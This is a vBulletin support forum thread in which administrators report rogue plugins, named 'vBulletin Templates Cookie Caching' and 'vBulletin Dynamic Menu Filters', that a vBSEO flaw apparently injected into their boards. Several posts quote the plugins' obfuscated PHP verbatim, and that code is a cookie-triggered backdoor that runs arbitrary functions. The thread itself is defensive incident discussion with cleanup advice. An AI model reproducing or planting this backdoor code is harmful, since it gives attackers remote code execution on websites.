Announcement

Collapse
No announcement yet.

Is This a Default Plugin?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Originally posted by Wayne Luke View Post
    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
    There is no log for the rogue plugins called "vBulletin Templates Cookie Caching" & "vBCMS Global Thread Cache". Not at any board I've checked that has those plugins at least. It simply exists at one point?

    Comment


    • #17
      Originally posted by DelDrago View Post
      This "vbCMS Global Thread Cache" has appeared on my site as well.

      Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
      Besides the plugin, what damage is there?

      However you should change all your passwords... Email, FTP, Admin CP, vBSEO, etc... Especially if you shared passwords among accounts or used any password shorter than 12 characters.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API

      Comment


      • #18
        Originally posted by Wayne Luke View Post
        Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
        I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).

        Comment


        • #19
          Originally posted by Talaturen View Post
          I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).
          vBSEO's release announcement suggests otherwise though. http://www.vbseo.com/f5/vbseo-securi...release-52783/

          I'd say we're all working to make the software as secure as possible. Eliminating any potential vector acheives that.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment


          • #20
            vBSEO's release announcement is incorrect then, because I've had another plugin added to the same spot even after making their update.

            I just made a post about it on their forums, which I've quoted below for convenience.
            http://www.vbseo.com/f5/vbseo-securi...61/#post325661
            Not sure if it might be related to this issue or not, but when I went and did a file diagnostics on my forum, it found that the file md5_sums_crawlability_vbseo.php was missing. Seeing as I installed vBSEO for the first time with the current version, I find it unlikely I would've missed uploading it when I installed the package.

            EDIT:
            It looks like the plugin is back and worse than before. Just went into my plugin manager to check, and found this under global_complete.

            vBulletin Templates Cookie Caching
            Code:
            /* vBulletin Templates Cookie Caching */
            $vbr="ofkqjhri";$vbh="158b2179e61097612d74754bbc1e8c7a";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
            EDIT 2:
            Okay, just went to my admin log and checked. The plugin being added is clearly showed there, however it's being shown as added by me and with the IP I am currently using.

            Here's the kicker though. At pretty much the exact time this plugin was added, I'd made the vBSEO config file writable so that I could change some settings. The timing seems too much to be of a coincidence.
            神出鬼没 - shin shutsu ki botsu

            Webmaster, Bulbagarden / Bulbapedia

            Comment


            • #21
              If they've done something else after already gaining access, they could be sneaking the plugin back in in a large number of ways.

              Comment


              • #22
                This is a VBSEO security issue: as soon as you log into VBSEO control panel, the plugin appears!!!!
                This is now confirmed by all other vbseo members

                Comment


                • #23
                  Originally posted by galerio View Post
                  This is a VBSEO security issue: as soon as you log into VBSEO control panel, the plugin appears!!!!
                  This is now confirmed by all other vbseo members
                  yes

                  you are right

                  Comment


                  • #24
                    Okay I have this plugin that I didn't install:

                    vBulletin Templates Cookie Caching

                    here is the code:
                    Code:
                    /* vBulletin Templates Cookie Caching */
                    $vbr="hgfzshne";$vbh="49cfac7025dfd5d00dc5a080c4a5c637";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
                    Is this an exploit and what do I need to do?

                    Comment


                    • #25
                      Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
                      神出鬼没 - shin shutsu ki botsu

                      Webmaster, Bulbagarden / Bulbapedia

                      Comment


                      • #26
                        Confirmed another name for it

                        Code:
                         /* vBulletin Dynamic Menu Filters */
                        (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
                        Found on a 4.1.8 install with VBSEO 3.6.
                        The opinions expressed in forum posts are my own personal opinions and do not represent any companies that i am associated with.

                        Comment


                        • #27
                          Same location as the previous ones?
                          神出鬼没 - shin shutsu ki botsu

                          Webmaster, Bulbagarden / Bulbapedia

                          Comment


                          • #28
                            Originally posted by Archaic View Post
                            Same location as the previous ones?
                            Yes same location, Ive checked 21 clients sites so far, 2 of them have been affected and also a test site that was only setup last week has been affected. So far ive found nothing else apart from the plugin but i am disabling VBSEO as precaution .
                            The opinions expressed in forum posts are my own personal opinions and do not represent any companies that i am associated with.

                            Comment


                            • #29
                              See: http://www.vbseo.com/f5/vbseo-securi...tml#post325689

                              Comment


                              • #30
                                Originally posted by Archaic View Post
                                Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
                                Will do!

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X